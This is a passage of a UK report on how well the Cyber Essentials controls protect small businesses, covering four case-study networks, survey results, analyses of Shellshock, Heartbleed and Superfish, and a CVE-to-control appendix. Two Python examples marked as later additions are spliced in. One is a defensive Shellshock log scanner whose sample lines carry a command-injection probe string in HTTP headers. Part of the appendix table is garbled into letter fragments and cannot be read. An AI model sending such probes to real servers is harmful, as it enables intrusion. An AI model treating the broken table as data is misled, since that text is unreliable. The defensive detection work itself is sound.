Guests are not permitted on the network, but may join a 'guest' network through the same access points with a mobile device. Wi-Fi logs and cloud service access logs are gathered and actively monitored. Employees can access the network from a validated machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.

Mitigation of applicable vulnerabilities. Of the 200 listed vulnerabilities, 116 were applicable to the third SME network.

Figure 10: SME-3 Vulnerability Mitigation

The requirement for web development SMEs to operate across multiple web browsers, on various versions, to test and build a customer's website means that the network accumulates all vulnerabilities in web browsers. As this is a specialist case, a recommendation for web development organisations could be to use one up-to-date browser for general use. A bespoke policy may then be put in place.

When working on alternative browsers, employees should only access client pages where the developer has control of the web content.

SME Network Four - Hotel Services

Figure 11: SME-4 Network

Physical Infrastructure. This company is located at a single site and has equipment composed of a single desktop PC and 2 company laptops running on an ADSL router; this same router also provides the internet connection for the guests. An alternative router is available as a manual fall-back connection to the internet, but is available only to company equipment.

The guest network is split from the office network through secondary access point names, filtering traffic into a separate VLAN internal to the router.

Services. No local servers are present to provide any service to employees or guests on the network.

File storage is provided through online services including Dropbox and SkyDrive. A standalone web server, owned and managed externally, runs the company website, and bookings are managed via a globally accessible website.

All the services are accessed with SSL-secured connections (HTTPS mainly).

User Access. User access is not mediated in any way, and any site can be accessed from any computer. Guests have no restrictions placed on their network usage either.

Operating systems. The company uses iOS for their mobile devices and Windows 8.1 for the office desktop and laptop PCs. Guests can bring their own equipment, so these will be a mix of all operating systems currently available, including Windows, Linux, Mac and others.

Existing Security Measures. Beyond the router's separation between the guest and office networks, no other network security measures are in place. The office PCs do have automatic patch installation configured, however, and have the Kaspersky antivirus suite installed.

Mitigation of applicable vulnerabilities. Of the 200 listed vulnerabilities, 103 were applicable to the fourth SME network.

Figure 12: SME-4 Vulnerability Mitigation

Similarly to SME 1, SME 4 requires the use of web browsers for bookings and reception of guests, so enables a wide variety of attack vectors through the web.

Thankfully, the services and servers they connect to are run by larger corporations, which will hopefully have implemented at least Cyber Essentials-grade security and protection, so the actual risks should be minimal.

For the purposes of this report, however, we assume that if this company has not implemented Cyber Essentials then the services they use must also not have, leaving them open to attack.

Survey Responses

Data gathered from survey responses affords a much broader look at the typical network deployments and practice in SMEs. The full results from 17 participants may be found in the Survey Responses section on page 27.

Physical Infrastructure. The majority of respondents belong to SMEs with 0-9 workstations on site; this is related to the size of an organisation, and could be considered representative of businesses across the UK.

Services. Local: file, email, database and domain servers are the most common local service providers, all present in more than a third of SMEs. Remote: email, web hosting and file sharing are the most common services provided remotely.

User Access. More than half of SMEs permit employees' own devices to be used in the workplace; for organisations such as these it is important to ensure that employee machines receive the same level of protection as the rest of the work network, as one vulnerable machine allows vulnerability into the whole company.

Existing Security Measures. Of the survey respondents, most SMEs have a firewall, password policy and data-loss prevention scheme in place. These are the most common security measures in place for the SMEs contacted; below this is access control, malware protection and finally patch management, which is present in a little over half of organisations.

Almost two-thirds of survey participants were previously aware of Cyber Essentials.

Survey Respondents Network

The network built from survey respondents' data considers the overall response in order to build a network easily adaptable to match that of the majority of SME network configurations.

Locally, email and file servers have been represented, with domain controller capabilities represented in a network ADSL router. Remotely, a web server is depicted, but remote services may also include database usage, email and other web services.


Figure 13: Adaptable Survey-Response Network

Typicality of Case-Study SMEs

Within the survey respondents' network, aspects of each of the interviewed SME networks are apparent.

The Finance SME network shares a local file server, as sensitive information needs to be kept and processed by the organisation. Any SME handling sensitive information will be likely to strongly consider using local file servers.

The Specialist SME shares with the survey respondents' data its use of SSH to connect remotely to services. SSH is an important tool for accessing sensitive data that is stored remotely, whether from home or the workplace.

The Web Development SME requires employees to connect to many web servers remotely; the survey respondents match this case with the use of external web-hosting services. That being said, in the general case this server is more likely to be the SME's own web-hosting solution rather than a client's.

The Hotel Services SME represents a very basic local network, using only cloud-based services remotely. This is becoming an increasingly popular trend for SMEs, as cloud services are often easier to set up and cheaper to maintain. This is also representative of many SMEs with little-to-no online presence.


Analysis of Cyber Essentials on High Profile Vulnerabilities

The following sections detail three of the high-profile vulnerabilities to hit the popular media in late 2014 to early 2015.

These are of particular note as, while they may not be the most damaging of attack vectors (although some are very serious), they have caught the attention of the public, and SMEs would be under pressure to ensure that they were protected.

With this in mind, we analyse how effective the Cyber Essentials security controls are at tackling these high-profile vulnerabilities.

“ShellShock”

Also known by the name “BashDoor”, Shellshock hit the news as it attacked the Linux server environment, and did so in a particularly effective manner.

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka “ShellShock.” NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

CVE-2014-6271 [13]

The exploit allowed attackers to directly execute arbitrary shell commands on a compromised system by altering environment variables. However, the bug was not enough by itself to actually enable attackers to compromise a system, but allowed access via other services. While the exploit is only effective if the bash environment can be altered, the results can be devastating, as it lays bare the entire system to many other forms of attack.

The threat was particularly insidious for SMEs who used Linux/Unix-based servers for services, mail servers as an example, as they would potentially have no idea that they had been compromised.
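As an added illustration of the defensive side of this section (example code written for this edition, not part of the report), the following Python snippet applies the widely published detection signature for Shellshock probes to constructed web server log lines. Bash treated an exported variable whose value began with "() {" as a function definition, so a request that tries to reach a CGI handler carries that opening sequence in a header the web server exports into the environment (User-Agent or Referer, typically); the sequence itself is what a log review looks for. The log lines, addresses and paths are constructed for the example, and the combined-log regular expression and the signature are this example's own assumptions rather than anything the report specifies.

```python
import re

# Bash parsed an exported variable beginning with "() {" as a function
# definition; CVE-2014-6271 lay in what it then did with the text after the
# closing brace. The opening sequence, with optional whitespace, is the
# signature used here (an assumption of this example, matching common IDS rules).
SHELLSHOCK_PATTERN = re.compile(r"\(\s*\)\s*\{")

# Apache "combined" log format, assumed for this example.
COMBINED_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"$'
)

# Constructed sample traffic (addresses from documentation ranges); the first
# and third lines contain brackets and braces that must not trigger a hit.
SAMPLE_LOG = r'''
198.51.100.7 - - [25/Sep/2014:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (Windows NT 6.1) {}"
203.0.113.9 - - [25/Sep/2014:10:01:05 +0000] "GET /cgi-bin/status HTTP/1.1" 200 0 "-" "() { :;}; echo probe"
192.0.2.15 - - [25/Sep/2014:10:01:09 +0000] "GET /about.html HTTP/1.1" 200 2210 "http://example.test/(news) {page=2}" "Mozilla/5.0 (Macintosh)"
203.0.113.44 - - [25/Sep/2014:10:01:12 +0000] "GET /cgi-bin/env.cgi HTTP/1.1" 500 0 "() { ignored; }; echo probe" "curl/7.37.0"
'''


def parse_combined(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    match = COMBINED_LOG.match(line)
    return match.groupdict() if match else None


def find_shellshock_probes(log_text):
    """List entries whose User-Agent, Referer or request line carries the signature."""
    hits = []
    for line in log_text.strip().splitlines():
        entry = parse_combined(line)
        if entry is None:
            continue  # unparseable line: a real deployment would count these
        for field in ("user_agent", "referer", "request"):
            if SHELLSHOCK_PATTERN.search(entry[field]):
                hits.append({"ip": entry["ip"], "request": entry["request"],
                             "field": field, "value": entry[field]})
                break  # one report per request is enough
    return hits


if __name__ == "__main__":
    for hit in find_shellshock_probes(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['request']!r}: {hit['field']} = {hit['value']!r}")
```

A hit in such a log does not by itself mean the host was exploitable; it records that a probe arrived, which is exactly the evidence an SME that depends on an outside provider for patching (the situation described for SMEs 3 and 4 later in this report) can still gather for itself.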

“Heartbleed”

Appearing in April 2014, the CVE-2014-0160 (aka “Heartbleed”) bug allowed attackers to directly read the active memory of a target machine through a buffer over-read. This then allowed attackers to access private credentials (or indeed anything else) in the RAM of the target.

As described in the original CVE report:

The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0160 [12]

As OpenSSL is a core part of many applications and services, both in the open and closed source world, this vulnerability had the potential to damage a huge number of systems. At the time of release, various sources (including, for example, Netcraft [15]) reported that up to 17% of trusted SSL-certified servers were vulnerable to the attack.

Depending on how the SME in question operates, the threat this particular CVE posed (and indeed still poses, with as yet to be updated servers still online with the vulnerability) is difficult to discern. Obviously the vulnerability is serious, but the ability of individual SMEs to detect and correct this flaw will vary greatly depending on the individual deployments.

Larger companies with their own Linux/Unix servers may have been able to deploy the patched OpenSSL version as soon as the patch was available, but smaller businesses, or those with more cloud-based services, may not have access to the software running on the servers they use and may be at the mercy of the respective operators to implement the fix. Because of this, patch management only partially remedies this vulnerability, and other protection methods from the Cyber Essentials guidelines, such as securing configurations or controlling access, will have unknown effects.

It is vulnerabilities such as this that pose the greatest threat to SME networks, as the methods to fix the issue are often outside the control of the company, potentially leaving them vulnerable far longer than one would expect.

“Superfish”

The SDK for Komodia Redirector with SSL Digestor, as used in Lavasoft Ad-Aware Web Companion 1.1.885.1766 and Ad-Aware AdBlocker (alpha) 1.3.69.1, Qustodio for Windows, Atom Security, Inc. StaffCop 5.8, and other products, uses the same X.509 certificate private key for a root CA certificate across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging knowledge of this key, as originally reported for Superfish VisualDiscovery on certain Lenovo Notebook laptop products.

CVE-2015-2077 [14]

This vulnerability is particularly interesting as the software causing the issue was effectively brokered by a trusted hardware vendor, namely Lenovo. Because the issue was part of the 'normal configuration' for the equipment, it remained undetected for a long time, and hints that there may be further breaches in security as yet undiscovered in both Lenovo and other manufacturers' equipment.

The vector is through the SuperFish software essentially breaking the chain of trust for SSL certificates by installing a self-signing certificate into the list of trusted certificates on the host machine. This allows an attacker to simply sign their own code via the same certificate, which itself can be easily gathered from any other machine running SuperFish, and they have full access to any SSL-secured connection from the target machine.

Thankfully, while the risks to users and SMEs were high, the fix is a simple one-time run of a removal tool provided by Lenovo themselves [11], and is mitigated fully through the Cyber Essentials patch management advice.

Threat Analysis

ShellShock. Without Cyber Essentials in place, SME 1 and 2 would be at risk from 'Shellshock', as they both operate Unix/Linux-based systems that would require patching to plug the security issue. The extent to which SMEs 3 and 4 are vulnerable to this issue is unclear, as their large dependency on outside service providers leaves them in a position where they are both unable to determine their vulnerability and additionally unable to remedy it.

With Cyber Essentials, SME 1 and 2 would be fully protected, and it is likely that SME 3 and 4 are also protected if the external providers also use Cyber Essentials or other security and patching schemes.

Heartbleed. The 'Heartbleed' bug is another vulnerability that, without Cyber Essentials guidelines being followed, would have laid companies' external-facing services open to malicious attackers.

In all cases, however, each SME can be fully protected with a combination of patch management, firewalling and application of access controls from the Cyber Essentials guidelines.

SuperFish. All of the SMEs we interviewed could be exceedingly vulnerable to the 'Superfish' issue without Cyber Essentials, as much of their operations revolve around SSL-encrypted communications. A break in the chain of trust for their certificates would allow an attacker to man-in-the-middle their communications.

Normal system updates would have failed to remedy the situation, as the fix provided by Lenovo consisted of a tool to be run in addition to the normal operating system patches. It is further debatable how effective Cyber Essentials patch management would have been in plugging this vulnerability, as it would require that the administrators be aware of the issue and know of the patch, rather than simply following 'normal' patching guidelines. Assuming that the persons responsible for the equipment are aware of the issue, however, then Cyber Essentials patch management fully mitigates this issue.


Conclusions

The Cyber Essentials security tools have been shown to mitigate, or to mitigate as soon as a patch is released, all vulnerabilities from remote attackers that do not exploit fundamentally insecure software or hardware. Of the two hundred vulnerabilities collected, eight exploits were not able to be resolved with the deployment of security patches; for vulnerabilities such as these the only mitigation available is simply not to install the compromised systems. To help prevent deployments being susceptible to attacks on faulty systems, it may be recommended that a blacklist of such items is composed for public reference.

Scope. It is important to consider that the scope of this study covers only internet-based commodity-level attacks, and although the Cyber Essentials tools perform very well in mitigating these, they do not represent full security. There is an increasingly identified risk from insiders that also requires attention, not least malicious acts but also users unknowingly compromising security.

The SMEs interviewed represent organisations from a range of market sectors: web development and online presence, specialist scientific services, the hospitality industry and finance.

Additional Tools

The 10 Steps to Cyber Security [2] identifies additional security measures that support the Cyber Essentials scheme well, to deliver additional security through indirect measures such as User Education and Awareness, along with Network and Systems Monitoring. These additional measures would serve to bolster cyber security by fortifying each employee of the SME with the necessary knowledge on safe practice, its importance and some basic technical understanding, just as they may be versed in environmental awareness. Network and Systems Monitoring allows remote user logins, as well as file access and activity, to be logged. For very small networks this may currently be infeasible, as the extra manpower or finances required for such a system are costly. However, for large organisations, additional monitoring capability should be explored as a future extension to Cyber Essentials, not just to identify and mitigate malicious action for more bespoke and sophisticated attacks than those reported on, but also to aid in providing evidence for any potential cyber-crime investigations.

There exist some collective approaches to improving cyber security; a notable example of this is the Cyber-security Information Sharing Partnership (CiSP) [4]. The partnership aims to benefit all members by providing real-time updates on issues of cyber security and discovered vulnerabilities, as well as best-practice guides and other cyber-threat information. It would be beneficial for more organisations to belong to cyber-security collectives like this, creating networks of informed individuals working together to tackle cyber-crime. This would be particularly useful to quickly identify potential vulnerabilities and possible patches, which, as shown in this report, is critical for the CE patch management security control to fully mitigate related vulnerabilities.

An important note to be made is toward the security of business affiliates and service providers. Even if an SME has Cyber Essentials in place, any use of cloud services relies on the vendor's security controls for threat mitigation. In other words, cloud email, accounting and any other cloud-based or remote services are only as secure as the service provider makes them. In general, cloud providers should be holding a high level of scrutiny to their security practice and should be encouraged to certify their protection. Hewlett-Packard (HP) has taken this further and has begun to strengthen its entire supply chain (600 SMEs) with the Cyber Essentials accreditation. This provides protection across the entirety of Hewlett-Packard's operations as well as its affiliates. This should be a goal for organisations of all sizes, minimising the risk from cyber-threats by ensuring all trading partners uphold the same high levels of security.

Cyber Essentials Controls

Of the five current Cyber Essentials controls, patch management was considered to aid in the mitigation of the highest proportion of remote attacks (87.5%); counter-intuitively, the survey responses had patch management ranked last in use for SMEs. The most commonly used controls could be seen as those providing the most intuitive or easily understood protection: data loss prevention, strong passwords and firewall. Patch management, meanwhile, isn't necessarily understood by individuals as a tool to greatly improve cyber security.

Anti-malware was useful in mitigating the fewest (10%) vulnerabilities. It is, however, important to note that anti-malware is largely the only security tool that may routinely scan the network hardware and software, as well as any items downloaded from the internet or received as email attachments. This serves as a last line of defence and as such is vital to an organisation's cyber-safety.
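To make the counting behind these proportions concrete, here is an added Python example (written for this edition, not code from the report) that parses rows in the layout of the report's appendix table (CVE, applicability flags for SME1 to SME4 and the idealised network, the outcome without Cyber Essentials, and the outcome with Cyber Essentials together with the controls credited) and computes the per-network applicability counts, the share of rows crediting each control, and the rows that no control resolves, which are the candidates for the "don't install" blacklist suggested in the conclusions. The eight rows embedded are a subset transcribed from the appendix, so the shares differ from the full-table figures quoted above; the pipe-separated layout, the normalisation of control names (bracketed qualifiers such as "(Secure Browser)" are dropped) and the function names are this example's own choices.

```python
import re
from collections import Counter

# Applicability columns in the order they appear in the appendix table.
FLAG_COLUMNS = ("SME1", "SME2", "SME3", "SME4", "Idealised")

# Subset of rows transcribed from the report's appendix table:
# CVE | SME1 | SME2 | SME3 | SME4 | Idealised | outcome without CE | outcome with CE - controls credited
APPENDIX_ROWS = """
CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0022 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0149 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-0172 | y | n | n | n | n | Not Mitigated | Mitigated - User Access (Strong Password), Patch Management
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-1700 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management, Anti-Malware
CVE-2013-2507 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Firmware Management, Anti-Malware
"""


def parse_rows(table_text):
    """Turn pipe-separated appendix rows into dicts; controls are only credited
    when the outcome with Cyber Essentials is (partially) mitigated."""
    rows = []
    for line in table_text.strip().splitlines():
        cells = [c.strip() for c in line.split("|")]
        if len(cells) != 8:
            raise ValueError(f"malformed row: {line!r}")
        cve, flags, without_ce, with_ce = cells[0], cells[1:6], cells[6], cells[7]
        status, _, credited = with_ce.partition(" - ")
        controls = []
        if status != "Not Mitigated":
            for name in re.split(r"[,&]", credited):
                name = re.sub(r"\s*\(.*?\)", "", name).strip()  # drop "(Secure Browser)" etc.
                if name:
                    controls.append(name)
        rows.append({
            "cve": cve,
            "applicable": {col: flag == "y" for col, flag in zip(FLAG_COLUMNS, flags)},
            "without_ce": without_ce,
            "status": status,
            "controls": controls,
        })
    return rows


def applicable_counts(rows):
    """How many listed vulnerabilities apply to each network (the 119/79/116/103 style figures)."""
    return {col: sum(r["applicable"][col] for r in rows) for col in FLAG_COLUMNS}


def status_counts(rows):
    """Mitigated / Partially Mitigated / Not Mitigated totals with Cyber Essentials in place."""
    return dict(Counter(r["status"] for r in rows))


def control_shares(rows):
    """Fraction of all rows on which each control is credited (the 87.5% / 10% style figures)."""
    credited = Counter(c for r in rows for c in r["controls"])
    return {c: round(n / len(rows), 3) for c, n in credited.items()}


def unpatchable(rows):
    """CVEs no control resolves: the 'don't install' blacklist candidates."""
    return [r["cve"] for r in rows if r["status"] == "Not Mitigated"]


def residual_risk(rows, column):
    """Unresolved CVEs that actually apply to the given network."""
    return [r["cve"] for r in rows if r["applicable"][column] and r["status"] == "Not Mitigated"]


if __name__ == "__main__":
    parsed = parse_rows(APPENDIX_ROWS)
    print("applicable:", applicable_counts(parsed))
    print("with CE:", status_counts(parsed))
    for control, share in sorted(control_shares(parsed).items(), key=lambda kv: -kv[1]):
        print(f"  {control:<22} {share:.1%}")
    print("unpatchable:", unpatchable(parsed))
```

On the full 200-row table the same functions reproduce the report's analysis; on this subset patch management is credited on 5 of 8 rows, and CVE-2013-1140 is the one entry whose only answer is not to deploy the affected product.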

Recommendations

To further improve cyber security across the UK, we recommend that:

1. Collective approaches to cyber security should be further encouraged. In particular, a governmental/collective approach to identifying inherently flawed products should be developed. This could be in addition to, or as an extension to, current initiatives like CiSP, which can make a difference in detecting and reacting to potential vulnerabilities in a timely manner.

2. Further research into the mitigation of other cyber-threats is carried out, to explore the risk from insider threats and targeted attacks.

3. Further employee education is strongly encouraged, especially to be able to tackle these other types of attacks mentioned above, which were not under the scope of this report.


References

[1] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, and Department for Business, Innovation and Skills. Cyber security guidance for business. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[2] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, and Department for Business, Innovation & Skills. 10 steps to cyber security. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[3] Department for Business, Innovation & Skills, CESG, UK Trade & Investment, Prime Minister's Office, 10 Downing Street, Centre for the Protection of National Infrastructure, and Government Communications Headquarters. Cyber security boost for UK firms. https://www.gov.uk/government/news/cyber-security-boost-for-uk-firms, January 2015.

[4] Centre for the Protection of National Infrastructure, CiSP, CERT-UK, and Department for Business, Innovation & Skills. Cyber-security information sharing partnership (CiSP). https://www.cert.gov.uk/cisp, March 2013.

[5] CREST. Cyber essentials certified companies. http://www.cyberessentials.org/list, March 2015.

[6] CVE.Mitre.org. Terminology - mitre.org. http://cve.mitre.org/about/terminology.html.

[7] Cyber Essentials. Cyber essentials scheme - overview. https://www.gov.uk/government/publications/cyber-essentials-scheme-overview.

[8] CESG, Cabinet Office, Centre for the Protection of National Infrastructure, and Department for Business, Innovation & Skills. Common cyber attacks: Reducing the impact. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400106/Common_Cyber_Attacks-Reducing_The_Impact.pdf, January 2015.

[9] UK Cyber Security Forum. North west cyber security cluster. http://www.ukcybersecurityforum.com/index.php/cyber-security-clusters/north-west-cluster, 2015.

[10] HM Government. Cyber essentials certified companies. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400914/bis-15-72-cyber-essentials-scheme-assurance-framework.pdf, January 2015.

[11] Lenovo. Superfish uninstall instructions. http://support.lenovo.com/us/en/product_security/superfish_uninstall.

[12] Mitre.org. CVE-2014-0160 aka Heartbleed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, 2014.

[13] Mitre.org. CVE-2014-6271 aka Shellshock. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, 2014.

[14] Mitre.org. CVE-2015-2077 aka Superfish. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2077, 2015.

[15] Netcraft. Half a million widely trusted websites vulnerable to Heartbleed bug. http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html, April 2014.

[16] Cabinet Office. The UK cyber security strategy - protecting and promoting the UK in a digital world. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/60961/uk-cyber-security-strategy-final.pdf, November 2011.

[17] Cabinet Office and The Rt Hon Francis Maude MP. Government mandates new cyber security standard for suppliers. https://www.gov.uk/government/news/government-mandates-new-cyber-security-standard-for-suppliers, September 2014.


Cyb

erC

ontr

ols

App

licab

ility

CV

ES

ME

1S

ME

2S

ME

3S

ME

4Id

ealis

edN

oC

EW

ith

CE

CV

E-2

01

3-0

00

8y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n(U

ser

Po

licy)

A

nti

-Mal

war

eC

VE

-20

13

-00

22

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-00

84

yy

yn

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

W

ebsi

teB

lack

listi

ng

CV

E-2

01

3-0

14

0y

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

14

9n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

13

-01

72

yn

nn

nN

ot

Mit

igat

edM

itig

ated

-U

ser

Acc

ess

(Str

on

gP

assw

ord

)P

atch

Man

agem

ent

CV

E-2

01

3-0

17

4n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Acc

ess

Po

licy

(Str

on

gP

assw

ord

)F

irew

all

Pat

chM

anag

emen

tC

VE

-20

13

-01

99

yn

nn

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

ampS

ecu

reC

on

fig

ura

tio

nC

VE

-20

13

-02

53

nn

yn

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Ser

ver)

CV

E-2

01

3-0

27

0n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

48

1n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

59

8n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

61

9y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

63

3y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

sin

g)

Fir

mw

are

Man

agem

ent

CV

E-2

01

3-0

64

9y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

sin

g)

Pat

chM

anag

emen

tC

VE

-20

13

-07

46

yy

yy

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

13

-07

53

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-07

87

yy

yy

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

90

9y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

03

5y

yy

yn

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

...(Secure Browser), Website Blacklisting (end of the row begun on the preceding page)

CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2013-1102 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-1144 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-1153 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1181 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1303 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1384 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser)
CVE-2013-1388 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1450 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-1472 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Access Policy)
CVE-2013-1553 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1620 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-1627 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1638 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1669 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1676 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1700 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management, Anti-Malware
CVE-2013-1734 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1777 | n | n | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-2319 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Firewall, Secure Configuration (Secure Browser)
CVE-2013-2340 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 14 of 28

CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2013-2350 | n | y | n | n | y | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-2492 | y | n | y | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2507 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Firmware Management, Anti-Malware
CVE-2013-2736 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-2780 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2803 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords, Patch Management
CVE-2013-2824 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2826 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2920 | n | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3064 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3116 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3137 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware, Secure Configuration (Don't install)
CVE-2013-3194 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3199 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3201 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3206 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3280 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-3387 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
